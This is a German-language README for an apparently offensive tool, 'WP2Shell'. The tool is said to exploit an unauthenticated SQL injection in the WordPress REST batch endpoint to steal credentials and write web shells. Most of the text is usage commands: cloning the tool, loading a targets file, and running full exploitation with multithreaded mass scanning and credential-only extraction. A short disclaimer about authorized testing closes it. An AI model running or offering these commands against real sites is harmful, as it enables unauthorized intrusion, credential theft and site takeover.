
WP2Shell - CVE-2026-63030 / CVE-2026-60137 Dieses Tool nutzt eine kritische SQL-Injection-Schwachstelle im WordPress-REST-API-Endpunkt `/wp-json/batch/v1` aus, die es nicht authentifizierten Angreifern ermöglicht, beliebige SQL-Abfragen auszuführen und Remote Code Execution (RCE) auf verwundbaren WordPress-Installationen zu erreichen.
Vollständiges Erkennungs- und Ausnutzungstool für die Schwachstelle im WordPress REST API Batch-Endpunkt.
Dieses Tool nutzt eine kritische SQL-Injection-Schwachstelle im WordPress REST API Endpunkt /wp-json/batch/v1 aus, die es nicht authentifizierten Angreifern ermöglicht, beliebige SQL-Abfragen auszuführen und eine Remote Code Execution (RCE) auf verwundbaren WordPress-Installationen zu erlangen.
Schwachstelle: CVE-2026-63030 / CVE-2026-60137
Vektor: WordPress REST API Batch-Endpunkt (/wp-json/batch/v1) SQL Injection
Auswirkung: Nicht authentifizierte RCE
Betroffene Versionen: WordPress 6.4.x und früher (spezifische Versionen noch offen)
SLEEP()-PayloadsORDER BY-TestsINTO OUTFILE (wenn erlaubt)# Clone the repository
git clone https://github.com/NULL200OK/wp2shell.git
cd wp2shell
# Install dependencies
pip install requests beautifulsoup4
# Create targets file
echo "https://target.com" > targets.txt
# Run discovery
python wp2shell.py targets.txt --scan --verbose
# Full exploitation
python wp2shell.py targets.txt --exploit --verbose
# Scan single target with verbose output
python wp2shell.py targets.txt --exploit --verbose
# Custom sleep time for slow servers
python wp2shell.py targets.txt --exploit --sleep 20 --verbose
# Multi-threaded scanning (20 threads)
python wp2shell.py targets.txt --exploit --threads 20 --verbose
# Skip shell writes (extract credentials only)
python wp2shell.py targets.txt --exploit --no-shell --verbose
# Force specific HTTP method
python wp2shell.py targets.txt --exploit --method POST --verbose
1- JSON-Bericht: Strukturierte Daten mit Schwachstellenstatus und extrahierten Anmeldeinformationen
2- HTML-Bericht: Schöne, farbcodierte Visualisierung mit klickbaren Shell-URLs
Dieses Tool ist ausschließlich für Bildungs- und autorisierte Testzwecke bestimmt. Verwenden Sie es nur auf Systemen, die Sie besitzen oder für die Sie ausdrückliche Testberechtigung haben. Der Autor übernimmt keine Verantwortung für Missbrauch.